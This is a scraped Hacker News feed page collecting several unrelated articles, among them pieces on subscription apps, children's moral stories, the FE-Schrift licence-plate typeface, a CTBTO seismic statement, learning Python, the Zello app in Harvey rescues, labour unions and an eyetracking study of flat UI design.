Quantcast
Channel: Hacker News
Viewing all 25817 articles
Browse latest View live

The Subscription App Paradox

$
0
0

The Push For Your Cash

You must sympathise with developers — they have challenges.

Creation of their beloved product, start-up funding, product refinement, launch, new features, making new friends because the others lost touch, oil to burn at midnight and divorce proceedings, etc.

Developers and entrepreneurs deserve to get paid for what they produce.

What I want to challenge is the preconceived notion that subscriptions are the best way.

Subscriptions are direct debits from your bank account and every $30 adds up.

Users need to think hard about the first rental and later renewals.

The Catalyst

Subscriptions or rentals, have been a business model since I can remember. Buying TVs in the 1970s was madness because they exploded, so we always rented.

Software companies switched to rental options in recent years. Adobe Photoshop could have cost you £600–700 but £20 a month for today’s subscription is affordable.

Microsoft charges £80 a year for Office 365 and while not much cheaper than a £120 one-off purchase, the latter excludes new feature updates and technical help.

Unlike larger software packages, apps are going through both an economic and cultural shift from one-off fees to rental.

In June 2016, Apple changed the iOS app store to encourage app subscriptions. Apple reduced their commission, 15% instead of 30%, and created 200 different price points for maximum flexibility. Google followed.

Hence, industry leaders push subscriptions with one purpose — to make more money.

The Fallacy of Recurring Revenue

One selling point for subscription based apps is the alleged continuous revenue it generates for the developer.

The assumption relies on customers re-subscribing each year and new customer subscriptions to compensate for those who leave.

The size of the marketplace guarantees profit, with growth in customers projected to be 2.87 billion smartphone users by 2020. If the subscription model carves out only a small fraction of these users, it will gain traction. Revenue from app stores will pass $190 billion by 2020 so there’s room for every business model.

Pay per download is falling out of favour with developers, everyone hates Ads, and the freemium model fails to guarantee user upgrades.

Subscriptions are here to stay and we need to accept it.

The challenge for app creators is to reverse the trend where 80% of users abandon apps within the year.


Oracle laid off all Solaris tech staff in a classic silent EOL of the product

$
0
0

Velkommen hjem!

Denne tidslinje er der, hvor du vil bruge mest af din tid og konstant få opdateringer om det, der interesserer dig.

Fungerer Tweets ikke for dig?

Hold over profilbilledet og klik på Følger-knappen for at stoppe med at følge enhver konto.

Deltag i samtalen

Tilføj dine tanker om ethvert Tweet med et svar. Find et emne, du er passioneret omkring, og hop direkte ind i samtalen.

Få mere af det, du elsker

Følg flere konti for at få øjeblikkelige opdateringer om de emner, du er interesseret i.

Gå aldrig glip af et Øjeblik

Følg de bedste historier, mens de sker.

Children's books with humans have greater moral impact than animals, study finds

$
0
0

Forget the morals that millennia of children have learned from the Hare and the Tortoise and the Fox and the Crow: Aesop would have had a greater effect with his fables if he’d put the stories into the mouths of human characters, at least according to new research from the University of Toronto’s Ontario Institute for Studies in Education (OISE).

In the Canadian study, researchers read one of three stories to almost 100 children between four and six years old: Mary Packard’s Little Raccoon Learns to Share, in which anthropomorphic animals learn that sharing makes you feel good; a version of the story in which the animal illustrations were replaced with human characters; or a control book about seeds.

Before they were read the story, the children chose 10 stickers to take home and were told that an anonymous child would not have any stickers to take home. It was suggested to the children that they could share their stickers with the stickerless child by putting them in an envelope when the experimenter was not looking. After they had been read the story, the children were allowed to choose another 10 stickers, and again asked to donate to the stickerless child.

The study, which has just been published in the journal Developmental Science, found that those children who were read the book with human characters became more generous, while “in contrast, there was no difference in generosity between children who read the book with anthropomorphised animal characters and the control book; both groups showed a decrease in sharing behaviour,” they write.

The academics, led by Patricia Ganea, associate professor of early cognitive development at OISE, said that existing studies using the same method showed that before they are six, “children share hardly any stickers with their friends, and even after age six, children keep most of the stickers for themselves”, so the task “offers a lot of room for children to change their sharing behaviour after reading the story”.

But reading a book about sharing “had an immediate effect on children’s pro-social behaviour”, they found. “However, the type of story characters significantly affected whether children became more or less inclined to behave pro-socially. After hearing the story containing real human characters, young children became more generous. In contrast, after hearing the same story but with anthropomorphised animals or a control story, children became more selfish.”

Ganea said that while “a growing body of research has shown that young children more readily apply what they’ve learned from stories that are realistic … this is the first time we found something similar for social behaviours”.

“The finding is surprising given that many stories for young children have human-like animals,” said Ganea.

From Aesop to the Gruffalo via Winnie-the-Pooh, talking animals play a major part in children’s literature. A 2002 review of around 1,000 children’s titles found that “more than half of the books featured animals or their habitats, of which fewer than 2% depicted animals realistically”, the majority anthropomorphising them.

Ganea felt that it would be useful for children’s authors to be aware of her research. “We tell stories to children for many reasons, and if the goal is to teach them a moral lesson then one way to make the lesson more accessible to children is to use human characters. Yes, we should consider the diversity of story characters and the roles they are depicted in,” she said.

Chris Haughton, author and illustrator of animal picture books including Oh No, George! and Shh! We Have a Plan, felt that while “a simple instructional moral message might work short term”, the stories that have longer impact are the ones that resonate deeply. “I read Charlotte’s Web as a child and I know that made a big impression on me. I thought about it for a long time after I read the story. I identified with the non-human characters. That, among other things, did actually turn me into a lifelong vegetarian. I think a truly engaging and quality story that resonates with the child will be replayed in their mind and that has the real effect on them and the course of their life,” he said.

Picture book author Tracey Corderoy said that in her experience, “where the main characters of a moral tale are animals as opposed to humans, the slight distancing that this affords the young child does a number of important things. It softens the moral message a little, making it slightly more palatable. Some would feel that this waters it down and makes it less effective. But the initial ‘saving-face’ that using animals brings quite often results, I feel at least, in keeping a child reader engaged.”

Kes Gray, the author of the bestselling rhyming animal series Oi Frog and Friends, was unperturbed by the researchers’ findings. “Authors and illustrators have no need to panic here, as long as we keep all of the animal protagonists in all of their future stories unreservedly cuddly. Big hair, big eyes and pink twitchy noses should pretty much nail it,” he said.

FE-Schrift: forgery-impeding typeface

$
0
0
From Wikipedia, the free encyclopedia
FE-Schrift
FE-Schrift.svg
CategorySans-serif
Designer(s)Karlgeorg Hoefer
FoundryBundesanstalt für Straßenwesen
Plate-KA-PA777.JPG
Sample
A demonstration of attempted alteration of characters set in the FE-Schrift typeface. The series "PBF" (top row) is modified to read "R3E" (middle row, in red). The correct appearance of the series "R3E" is shown in the bottom row.

The FE-Schrift[1] or Fälschungserschwerende Schrift (forgery-impeding typeface) is a typeface introduced for use on license plates. Its monospaced letters and numbers are slightly disproportionate to prevent easy modification and to improve machine readability. It has been developed in Germany where it has been mandatory since November 2000.[2]

The abbreviation "FE" is derived from the compound German adjective "fälschungserschwerend" combining the noun "Fälschung" (falsification) and the verb "erschweren" (to hinder). Other countries have later introduced the same or a derived typeface for license plates taking advantage of the proven design for the FE-Schrift.

Development

The motivation for the creation of the typeface was spun in the late 1970s in the light of Red Army Factionterrorism when it was discovered that with the then-standard font for vehicle registration plates—the DIN 1451 font—it was particularly easy to modify letters by applying a small amount of black paint or tape. For example, it was easy to change a "P" to an "R" or "B", a "3" to an "8", or an "L" or "F" to an "E". Modifications to FE-font plates are somewhat more difficult, as they also require the use of white paint, which is easily distinguished at a distance from the retroreflective white background of the plate, in particular at night.

The original design for the FE-Schrift typeface was created by Karlgeorg Hoefer who was working for the Bundesanstalt für Straßenwesen (Federal Highway Research Institute of Germany) at the time. The typeface was slightly modified according to the results of tests that lasted from 1978 to 1980 at the University of Giessen (Department of Physiology and Cybernetic Psychology).[3] Whilst the DIN typeface was using a proportional font, the FE-Schrift is a monospaced font (with different spacing for letters and numbers) for improved machine readability. Faked FE-Schrift letters (e.g., "P" to "R") appear conspicuously disproportionate.

The final publication in German law for the usage on license plates includes three variants – normal script ("Mittelschrift" - 75 mm high and 47.5 mm wide letters and 44.5 mm wide digits), narrow script ("Engschrift" - 75 mm high and 40.5 mm wide letters and 38.5 wide digits) and a small script ("verkleinerte Mittelschrift" - 49 mm high and 31 mm wide letters and 29 mm wide digits).[2] The legal typeface includes umlaut vowels as these occur in German county codes at the start of the license plate number.[4] The narrow font allows nine characters to be put on a standard Euro license plate — shorter numbers are supposed to be printed with larger spaces between characters as to fill the available space on the plate.

Adoption process

When the FE-Schrift was finished in 1980 the pressure for its adoption had lessened already. Its distribution was furthered by another event being the introduction of the Euro license plate. Some federated states of Germany introduced the new design during 1994 and since 1 January 1995 it was introduced nationwide by a federal law that came to include the FE-Schrift as well as it had been in the planning since the 1970s. The shift in legislation matches with the first Schengen zone to lift borders during 1995. With the extension of the Schengen zone in 1998 the new license plate design found EU-wide acceptance (even for non-Schengen countries) thereby lifting the older requirement of adding an extra country code plate on the car when roaming to other countries which constitutes an advantage to citizens. Shortly later the option to be issued an old (non-Euro) license plate design were dropped on 1 November 2000 and the legislation dropped the older typeface for license plates alongside. The FE-Schrift is mandatory in Germany since that time although older license plates continue to be valid. There is an exception for historic cars to get a new license plate in the DIN typeface, and the Bundeswehr armed forces continue to generally issue their plates in the DIN typeface.

Other countries have begun to introduce a false-hindering script as well, either taking over the FE-Schrift or using a derivative variant. Taking over the original design, including the Euro license plate format, is generally cost-effective[5]– while in many countries the car license plates are produced by the state it is not the case in Germany. In Germany the car owner has to pay for a new license plate which gets a license stamp to be valid on the road (the round stamp is placed between county code and the local registration code). In the vicinity of the vehicle registration offices several small shops compete to press a license plate on the spot – their printing machines are highly standardized and the German license plate design is tailored to allow for cheap production in high quality.[6]

  • Argentina– since 2016
  • Armenia– since 2014
  • Bosnia and Herzegovina– in 2009 the new Euro-style license plate design was introduced along with the FE-Schrift typeface. The new design (dropping the national crest from the old Euro-style license plates as it was used since 1998) is more similar to the Euro license plate.
  • Chile– since April 2014
  • Colombia - since 2016 only for diplomatic cars
  • Cuba resolved a law on a new license plate scheme in 2013 which opted for the Euro license plate format and the FE-Schrift. The reasoning is to lower the cost while increasing the quality of the plates with the change to be completed by May 2016.[5]
  • Cyprus– since 3 June 2013
  • Latvia - only for tractors and tractor trailers. On car, car trailer and motorcycle plates they use DIN 1451.[7]
  • Kyrgyzstan– since 2016[citation needed]
  • Malta– a Euro-style license plate design was introduced in 1995 and after the official accession to the EU in 2004 the new Euro license plates were standardized on the FE-Schrift.
  • Moldova– since 1 April 2015
  • Sri Lanka– since August 2000, with a variation of the FE-Schrift developed by a German company
  • South Africa– the numbering scheme and license plate design were changed in 1994 which did also introduce the FE-Schrift.
  • South Sudan– initially only used on government vehicles[8]
  • Tanzania, Namibia, Zambia, Cameroon, Sierra Leone, Botswana, Mali, Ethiopia, Guinea, Malawi, Zimbabwe, Rwanda, Mozambique, Uganda– other African countries followed with Tanzania using FE-Schrift since the 1990s.
  • Uruguay– the old numbering scheme with three digits was exhausted in 2001 leading to a new scheme in 2002 in Montevideo which did not only include four digits but the new design came to use the FE-Schrift as well. The new license plate design is mandatory for Uruguay since 2011.
  • Uzbekistan– since 2009


Some countries[which?] allow the FE-Schrift as an alternative to the standard typeface especially in combination with a Euro-style license plate. This is used often for vanity plates for German car models, e.g. in Australia.

See also

References

  1. ^Schrift für Kfz-Kennzeichen. Bundesanstalt für Straßenwesen. Postfach 100150, 51401 Bergisch Gladbach, Germany.
  2. ^ abStVO, FZV – Anlage 4
  3. ^http://www.fsd.it/usefuldesign/german_plates_font.htm
  4. ^see Vehicle registration plates of Germany
  5. ^ abMarcel Kunzmann (2013-05-22). "Kuba modernisiert seine Kfz-Kennzeichen". Cuba Heute.
  6. ^Maschinen und Werkzeuge zur Herstellung von gepägten Kfz-Kennzeichen (in German). Autoschilder Sievers. 2014-05-10.
    / dubbed as Machines and tools for the assembly of automobile number plates. Autoschilder Sievers. 2014-05-12.
  7. ^http://avto-nomer.ru/newforum/index.php?app=forums&module=forums&controller=topic&id=9152
  8. ^"South Sudan to have unified number plates for cars". Gurtong. 4 February 2016. Retrieved 2 October 2016.

CTBTO statement on the unusual seismic event detected in the DPRK

$
0
0

Vienna, 3 September 2017

“Our monitoring stations picked up an unusual seismic event in the Democratic People’s Republic of Korea (DPRK) today at 03:30 (UTC). So far over 100 of our stations are contributing to the analysis. The event seems to have been larger than the one our system recorded in September last year and the location is very similar to that event. Our initial location estimate shows that the event took place in the area of the DPRK’s nuclear test site. ( 03-SEP-2017 03:30:06 LAT=41.3 LON=129.1 )
 
Our experts are now analysing the event to establish more about its nature and we are preparing to brief our Member States today in Vienna.
 
“If confirmed as a nuclear test, this act would indicate that the DPRK's nuclear programme is advancing rapidly. It constitutes yet another breach of the universally accepted norm against nuclear testing; a norm that has been respected by all countries but one since 1996. It also underlines yet again the urgent need for the international community to act on putting in place a legally binding ban on nuclear testing once and for all. I urge the DPRK to refrain from further nuclear testing and to join the 183 States Signatories who have signed the Comprehensive Nuclear-Test-Ban Treaty (CTBT).  I sincerely hope that this will serve as the final wake-up call to the international community to outlaw all nuclear testing by bringing the CTBT into force,” said Lassina Zerbo, Executive Secretary of the Comprehensive Nuclear-Test-Ban Treaty Organization (CTBTO).
 
Broadcast quality footage will be posted in the CTBTO Newsroom as it becomes available.

Background
 
The CTBT bans all nuclear explosions. The Treaty will enter into force once signed and ratified by the remaining eight nuclear technology holder countries: China, Egypt, the DPRK, India, Iran, Israel, Pakistan, and the United States.
 
A verification regime is being built to monitor compliance with the Treaty. Nearly 90 percent of the 337 facilities of the International Monitoring System (IMS) are already in place; see interactive map. The system swiftly, reliably and precisely detected all five DPRK’s declared nuclear tests. After the DPRK announced nuclear test on 12 February 2013, the CTBTO was the only organization to detect radioactivity attributable to the event.
 
CTBTO Member States are provided with data collected by the monitoring stations, as well as data analyses prepared by the International Data Centre in Vienna, Austria. Once the Treaty has entered into force, an on-site inspection can be invoked in case of a suspicious event.

For updates follow us on Twitter @ctbto_alerts and @SinaZerbo

FRENCH VERSION

Learning Python Without Library Overload

$
0
0

I was just browsing Quora after coming back from dinner, and there were lot of night owls asking “How do I learn XYZ from scratch?”

Naturally, I swooped in to assist with the Python-related questions. Believe it or not, there is a wrong way to learn Python. I have seen many people of many different ages get burnt out on learning Python because they went about it all wrong. The key to learning Python is to do just that, no more, no less.

Learn Python, not Libraries

Python packages can both extend its functionality and modify the way it is written. There are a ton of packages available, and some of them are so large and complex that they require a course of their own. I often see self-educators get hung up on package-specific syntax while trying to learn vanilla Python.

People can get burnt out on Python when they try to learn it in conjunction with packages that alter its syntax and behavior. Thus, for a self-educator’s first few projects, I recommend they avoid complex packages to better familiarize themselves with vanilla Python.

Packages to Avoid While Learning

  • numpy and pandas
  • matplotlib
  • PIL and cv2
  • beautifulsoup, selenium, urllib, and scrapy
  • flask, django, jinja2
  • tkinter, pyqt, pyWX

Packages Encouraged while Learning

  • os, sys, and argparse
  • re
  • json, csv, and pprint
  • datetime and time
  • math, statistics, and random

Case Study

I was once tutoring a Master’s candidate at the University of Virginia how to use Python. She was interested in learning Python to interface with the OpenCV API via the cv2 module. I had recommended her many educational resources from complete beginner texts to advanced OpenCV texts.

After a week of self-teaching, she had not made much progress in learning Python, mainly because she was trying to debug a specific script she found online. The script would read images via OpenCV’s cv2, then use matplotlib to display the images. The script used a strange matplotlib function I had never seen before for displaying the images. So, when she came to me with the error, I had no idea how to fix it. But… I did know how to accomplish the same thing with purely cv2.

All the while, she had learned nothing about Python itself, because she was busy trying to debug a matplotlib function. Obviously, her time would have been much better spent reading the first few chapters of an introductory Python book. I wouldn’t say that this student was unmotivated, rather that she was working a little too hard to fix an archaic and unnecessary matplotlib function.

So, we had to go back to the basics (where we should have started). This was no big deal, but it shined a light on how cavalier attitudes towards learning often do more harm than good.

Conclusion and Project Ideas

Keen readers may have noticed that all of the packages listed as “encouraged” for learning are shipped with vanilla Python. There is a reason for this. The core developers only write and accept highly Pythonic packages for distribution with the base environment.

Don’t be afraid to get your hands dirty with educational projects. Even if they don’t do anything useful or new, they are important to your education in a language where almost everything has been packaged already.

  1. Summary Stats. Read in a csv file supplied to the command line via argparse and os, read the csv file into a list of lists with csv, generate summary statistics with math and statistics, then print a friendly table of summary statistics with pprint or string formatting.
  2. Book Analyzer. Read in Romeo and Juliet as an enormous string using os and with statements, then use re to count occurrences of common words or letters. Print statistics about the frequencies and see if they follow to Zipf’s Law.
  3. Sudoku Checker. Given a 9×9 list of numbers (organized as a list of lists) check if a Sodoku row, column, square, and board are valid. Use random to generate integers for your board. Experiment with slice notation in lists of to write efficient code. If you are feeling ambitious, use random and for loops to estimate the probability of a random sodoku row, column, square, and board being valid under various conditions.

Once you are comfortable with the core tenants of Python, and the Pythonic elements of the syntax, you will have an easy and productive time exploring its best libraries.

Zello: The ‘Cajun Navy’s’ secret weapon for saving lives

$
0
0

The Cajun Navy is utilizing several apps in its efforts to rescue victims of Tropical Storm Harvey. (Jhaan Elker/The Washington Post)

For so much of our moment-to-moment communication, texting fits the bill. Quick and convenient, tapping out a few words with your thumbs cuts through the pleasantries that can bog down voice communication.

But there are times when a single word — especially one uttered with emotion — can deliver far more information than a text.

For example: An elderly victim screaming “help” as the waters rise in the aftermath of Hurricane Harvey.

“With voice, someone can communicate a ton of information in a way that text does not,” said Bill Moore, the chief executive of Zello, a free Internet “walkie-talkie” app. “In a few seconds of hearing your voice, I can guess what part of the country you’re from, if you’ve been drinking, what mood you’re in, whether you’re afraid or in distress.”

“For that reason, voice becomes great for solving problems, and it demands attention from both sides in a way that texting does not,” he added. “Your brain is wired for voice.”

Therein lies the secret behind the proliferation of Zello, which has become the preferred mode of communication for organizations such as the “Cajun Navy,” an informal group of Louisiana boat owners who participated in this week’s search-and-rescue missions in Southeastern Texas.

The app allows flood victims and rescuers to communicate instantly. It also allows both groups to post voice messages to specific channels that have been set up to aid people seeking assistance, such as “Texas Volunteer Rescue/Support” and “Harvey Animal Rescue” and the “CajunNavy,” which has nearly 25,000 users.

Over the past week, Moore said, Zello usage has increased twentyfold. The number of user sessions increased 600 percent over the past week, with the amount of time users in the Houston area were on the app increasing to 22 minutes, Moore said.

The app is another powerful example of how social media is filling the humanitarian holes that local government is unable to plug, turning ordinary people into heroes and empowering desperate flood victims to reclaim their fate from the rising floodwaters. Flood victims have also turned to Facebook, Instagram and Twitter to reach private rescuers when public officials have been overwhelmed. But as messages on those platforms proliferated and became unwieldy to manage, the Cajun Navy began asking people to connect with rescuers using Zello exclusively.

The app relies on cellphone data plans or WiFi, Moore said, but was designed to operate in areas where signals can be weak, such as those served by the outdated telecom technology known as 2G.

“That’s why it’s so popular in disaster areas,” Moore said.

Rescuers consider the app a hybrid between talking and texting. Unlike a Twitter conversation, which can be difficult to follow, Zello allows groups of people to communicate simultaneously, which is advantageous for grass-roots rescue efforts and has led some to label the app “social radio.”

The app has 100 million users around the globe, Moore said, often in countries were government services struggle to meet demand, such as Egypt, South Africa, Venezuela, parts of the Middle East and now parts of the U.S. Gulf Coast.

“It’s really common in times of trouble for a rescue structure to emerge organically,” Moore said. “The Cajun Navy is using Zello to augment the emergency services and build a culture that is quick and effective.”

There are limitations. The app doesn’t work if it can’t connect to a network, and users must be aware of its existence, an issue for any new product. That can be a problem for those who don’t own mobile phones or are unfamiliar with apps. Overwhelmingly, those are the same people who are most vulnerable during disasters — the poor and the elderly.

Still, the app offers a window into the role technology can play in a crisis.

As the tragedy in southeast Texas unfolded this week, rescuers could be heard discussing all manner of chaos, from an elderly couple trapped on their roof to a fire at a chemical plant that threatened to contaminate the surrounding floodwaters.

“I have a diabetes patient and a sick baby,” a woman could be heard saying Wednesday, before offering her address. “I need a boat rescue.”

“I have a 102-year-old male in Port Arthur taking on quite a bit of water, and he cannot swim,” another woman said urgently moments later. “He is in a panic.”

“There’s an elderly lady, 61, rising water,” another user reported. “She needs help.”

The app was also being used to help rescuers coordinate among one another. Between desperate calls for help from all over the region Wednesday afternoon, boaters checked in to confirm particular victims had been rescued, trade information about inaccessible areas and offer details about a staging area where boaters could grab a bite to eat and talk to the media. Moments later, a request arrived for boaters to patrol that night with sheriff’s deputies attempting to keep looters at bay. People seeking to volunteer their experience, such as individuals with boats and fast-water rescuing experience, also left messages offering their service.

When Zello channels experience high traffic, victims are encouraged to write down crucial information about their location and send a picture to channels that rescuers can view, which happened constantly Wednesday.

“Is anyone in the southwest area of Houston, by loop 610 and highway 59,” a man could be heard saying. “I have an address to submit to you guys. It’s not for me, it’s for someone on my Periscope page.”

Nearly 170 miles away in Austin, where Zello is based, Zello’s chief executive was listening as well.

Moore said he’s been spending several hours a day listening to Zello traffic in his office while working. He hears tragedy, of course, but also triumph.

“It’s really fascinating to listen to,” he said. “You find yourself wanting to cry when someone is about to drown and then feeling thrilled when someone has been rescued.” 

“The app feels like a shared experience,” he added.

MORE READING: 

You can now have sushi delivered by a drone

Elon Musk calls for ban on killer robots before ‘weapons of terror’ are unleashed

See the cool kids lined up outside that new restaurant? This app pays them to stand there.

It’s time to balance the power between workers and employers

$
0
0

Lawrence Summers is a professor at and past president of Harvard University. He was treasury secretary from 1999 to 2001 and an economic adviser to President Barack Obama from 2009 through 2010.

The central issue in American politics is the economic security of the middle class and their sense of opportunity for their children. As long as a substantial majority of American adults believe that their children will not live as well as they did, our politics will remain bitter and divisive.

Surely related to middle-class anxiety is the slow growth of wages even in the ninth year of economic recovery. The Phillips curve — which postulates that tighter labor markets lead to an acceleration of wage growth — appears to have broken down. Unemployment is at historically low levels, but the Bureau of Labor Statistics reported Friday that average hourly earnings last month rose by all of 3 cents — little more than a 0.1 percent bump. For the past year, they rose by only 2.5 percent. In contrast, profits of the S&P 500 are rising at a 16 percent annual rate.

What is going on? Economists don’t have complete answers. In part, there are inevitable year-to-year fluctuations (profits have declined in several recent years). And in part, BLS data reflects wages earned in the United States, even though a bit less than half of profits are earned abroad and have become more valuable as the dollar has declined relative to other currencies. And finally, wages have not risen because a strengthening labor market has drawn more workers into the labor force.

But I suspect the most important factor is that employers have gained bargaining power over wages while workers have lost it. Technology has given some employers — depending on the type of work involved — more scope for replacing American workers with foreign workers (think outsourcing) or with automation (think boarding-pass kiosks at airports) or by drawing on the gig economy (think Uber drivers). So their leverage to hold down wages has increased.

On the other hand, other factors have decreased the leverage of workers. For a variety of reasons, including reduced availability of mortgage credit and the loss of equity in existing homes, it is harder than it used to be to move to opportunity. Diminished savings in the wake of the 2008 financial crisis means many families cannot afford even a brief interruption in work. Closely related is the observation that workers as consumers appear more likely than years ago to have to purchase from monopolies — such as a consolidated airline sector or local health-care providers — rather than from firms engaged in fierce price competition. That means their paychecks do not go as far.

On this Labor Day, we would do well to remember that unions have long played a crucial role in the American economy in evening out the bargaining power between employers and employees. They win higher wages, better working conditions and more protection from unjust employer treatment for their members. More broadly, they provide crucial support in the political process for programs such as Social Security and Medicare that benefit members and nonmembers alike. (Both were passionately opposed by major corporations at their inception.)

Today, only 6.4 percent of private-sector workers belong to a union — a decline of nearly two-thirds since the late 1970s. This is the one important contributor to the decline in the relative power of labor, especially those who work with their hands. Workers seeking gigs on their own are inevitably less secure than a group collectively representing their interests. The decline in unionism is also a contributor to the pervasive sense that our political system is too often for sale to the highest bidder.

What can be done? This surely is not the moment for lawmakers to further strengthen the hand of large employers over their employees. Sooner or later — and preferably sooner — labor-law reform should be back on the national agenda, especially to punish employers who engage in firing organizers. We should also encourage union efforts to organize people in nontraditional ways, even when they do not involve formal collective bargaining. And policymakers should support institutions such as employee stock ownership plans, where workers have a chance to share in profits and in corporate governance.

In an era when the most valuable companies are the Apples and the Amazons rather than the General Motors and the General Electrics, the role of unions cannot go back to being what it was. But on this Labor Day, any leader concerned with the American middle class needs to consider that the basic function of unions, balancing the power of employers and employees, is as important to our economy as it has ever been.


Flat UI Elements Attract Less Attention and Cause Uncertainty

$
0
0

The popularity of flat design in digital interfaces has coincided with a scarcity of signifiers. Many modern UIs have ripped out the perceptible cues that users rely on to understand what is clickable.

Using eyetracking equipment to track and visualize users’ eye movements across interfaces, we investigated how strong clickability signifiers (traditional clues such as underlined, blue text or a glossy 3D button) and weak or absent signifiers (for example, linked text styled as static text or a ghost button) impact the ways users process and understand web pages.

About the Study

Webpages Used as Stimuli

There are many factors that influence a user’s interaction with an interface. To directly investigate the differences between traditional, weak, and absent signifiers in the visual treatments of interactive elements, we needed to remove any confounding variables.

We took 9 web pages from live websites and modified them to create two nearly identical versions of each page, with the same layout, content and visual style. The two versions differed only in the use of strong, weak, or absent signifiers for interactive elements (buttons, links, tabs, sliders).

In some cases, that meant taking an already flat page and adding shadows, gradients, and text treatments to add depth and increase the strength of the clickability signifiers. In other cases, we took a page that already had strong, traditional signifiers, and we created an ultraflat version. We were careful that the modifications we provided were reasonable and realistic.

We chose these interfaces as study materials because, for the most part, they’re decent designs that are representative of the better sites on the web. We set out to isolate the differences between signifier-rich and signifier-poor interfaces, not to evaluate the design of these sites.

We selected 9 sites from 6 different domains:

  • Ecommerce (bookstore, sunglass retailer, fine jewelry)
  • Nonprofit
  • Hotel
  • Travel (car rental, flight search engine)
  • Technology
  • Finance

For each of the stimuli pairs, we wrote a short task to direct the user’s attention to a specific interactive element on the page. For example, for the hotel site, the task was: “You will see a page from a hotel website. Reserve this hotel room. Please tell us when you have found where you would click.”

All 18 page designs and the wording of all 9 tasks are available in a sidebar.

Methodology

We conducted a quantitative experiment using eyetracking equipment and a desktop computer. We recruited 71 general web-users to participate in the experiment. Each participant was presented with one version of the 9 sites and given the corresponding task for that page. As soon as participants saw the target UI element that they wanted to click to complete the task, they said “I found it” and stopped.

We tracked the eye movements of the participants as they were performing these tasks. We measured the number of fixations on each page, as well as the task time. (A fixation happens when the gaze lingers on a spot of interest on the page).

Both of these measures reflect user effort: the more fixations and time spent doing the task, the higher the processing effort, and the more difficult the task. In addition, we created heatmap visualizations by aggregating the areas that participants looked at the most on the pages.

The study was conducted as a between-subjects design — each participant saw only one version of each page. We randomized assignment to either version of each page, as well as the order in which participants saw the pages. (See our course on Measuring User Experience for more on designing quantitative studies.)

All participants began with a practice task on the same stimulus to make sure they understood the instructions before they began the real tasks. Especially with quantitative studies like this one, it’s a good idea to use a practice task to ensure that participants understand the instructions. (It’s also best to conduct pilot testing before even starting the real study to iron out any methodology issues.)

This experiment was not a usability study. Our goal was to see how users processed individual page designs, and how easily they could find the target elements, not to identify usability problems in the designs. (Usability studies of live sites rarely involve a single page on a website; most often, people are asked to navigate through an entire site to accomplish a goal.)

Results

Number of Fixations and Time on Page

When we compared average number of fixations and average amount of time people spent looking at each page, we found that:

  • The average amount of time was significantly higher on the weak-signifier versions than the strong-signifier versions. On average participants spent 22% more time (i.e., slower task performance) looking at the pages with weak signifiers.
  • The average number of fixations was significantly higher on the weak-signifier versions than the strong-signifier versions. On average, people had 25% more fixations on the pages with weak signifiers.

(Both findings were significant by a paired t-test with sites as the random factor, p < 0.05.)

This means that, when looking at a design with weak signifiers, users spent more time looking at the page, and they had to look at more elements on the page. Since this experiment used targeted findability tasks, more time and effort spent looking around the page are not good. These findings don’t mean that users were more “engaged” with the pages. Instead, they suggest that participants struggled to locate the element they wanted, or weren’t confident when they first saw it.

22% longer task time for the weak-signifier designs may seem terrible. But remember that our metrics reflect time spent while looking for where to click. The tasks we measured were very specific and represent just a small component of real web tasks. In regular web use, people spend more time on other task aspects such as reading the information on a page. When you add in these other aspects, the slowdown for a full task (such as shopping for a new pair of shoes) would often be less than the 22% we measured.

On the other hand, the increased click uncertainty in weak-signifier designs is likely to sometimes cause people to click the wrong thing occasionally — something we didn’t measure in this study. Recovering from incorrect clicks can easily consume more time, especially since users don’t always realize their mistake immediately. Beyond the actual time wasted, the emotional impact of increased uncertainty and decreased empowerment is an example of how mediocre experience design can hurt brand perception.

Heatmaps

Heatmaps are quantitative visualizations that aggregate the number and duration of eye fixations on a stimulus (the UI). They can be created from the gaze data of many participants, as long as they all look at the same stimulus with the same task.

Heatmaps based on all participants’ data convey important information about the page areas that are relevant for the task (provided that the number of participants is high enough). In our color coding, the red areas were those which received the most and longest fixations. Orange, yellow, and purple areas received less attention, and areas with no overlay color were not viewed by any of the test participants.

When comparing the two versions of each page pair (strong signifiers vs. weak signifiers) we found that the pages fell into two groups: those with nearly identical user gaze patterns for the two versions, and those with different user gaze patterns (as indicated by the heatmaps).

Page Pairs with Different User Gaze Patterns

Of the pages we tested, 6 out of the 9 pairs had different user gaze patterns. With the exception of the signifier strength, we eliminated all other variations in page design within a given pair, so we can conclude that the signifiers changed how users processed the page in their task.

One major overarching difference emerged when comparing the 6 pairs of page. The weak-signifier versions of the pages resulted in a broader distribution of fixations across the page: people had to look around more. This result reinforced our findings that weak-signifier pages required more fixations and more time than strong-signifier ones.

We never saw the reverse pattern: no strong-signifier version had a more outspread distribution than its weak-signifier counterpart.

This difference suggests that participants had to consider more potentially interactive elements in the weak-signifier versions. Because the target elements (links, tabs, buttons, sliders) lacked strong, traditional signifiers, they didn’t have the same power to draw the participants’ attention or confidence. In many cases, participants fixated on the target element, but then moved on to other elements on the page — presumably because they hadn’t immediately recognized it as the solution to the task.

Of the six sites, one page pair displayed a particularly dramatic difference in the heatmaps. The original interface used to create the stimuli was a zig-zag layout from a fine-jewelry website. The page layout featured three sections, each with a heading, short paragraph of text, product image, and text link.

To create the strong version of the page, the text links were given a traditional link treatment: blue color and underlined text. To create the weak version, we took inspiration from a common tactic of ultraflat designs, and made the text links identical to the static text. The placement of the text links (below the paragraphs) was left the same in both stimuli.

Participants were asked to find the pearl jewelry on the site. The intended target was a Shop Pearl link at the bottom of the page.

The weak-signifier version showed red areas on the primary navigation, as well as on the 3 Year: Pearl heading. In contrast, the target link received most fixations in the strong-signifier variant. When we inspected the individual-participant data, we discovered that many users (9 of the 24 participants) who saw the weak signifier version stopped at the subheading, and never looked at the text link. They believed they could click on that subheading to reach the pearl jewelry and didn’t continue down to see the link.

In the strong signifier version, 86% (25 out of 29) participants first fixated on the heading, and then moved to the Shop Pearl target link. In the weak version, only 50% (12 out of 24) followed this pattern. (This difference is statistically significant; p < 0.005.) The links styled like static text didn’t draw users’ eyes down from the subheading, while the strong, traditionally styled links did.

Page Pairs with Nearly Identical User Gaze Patterns

3 of the 9 sites resulted in no differences in the gaze patterns between strong and weak signifiers. Why are these three page pairs nearly identical, while the other six pairs showed substantial differences?

The answers give us some interesting information about when flat UIs can work without damaging interaction.

One of the stimulus pairs had in-line text links as the target element: light purple, nonunderlined links vs. traditional blue, underlined links. In this pair, the weak-stimulus heatmap only showed a very slightly wider distribution of fixations on the paragraph containing the target link.

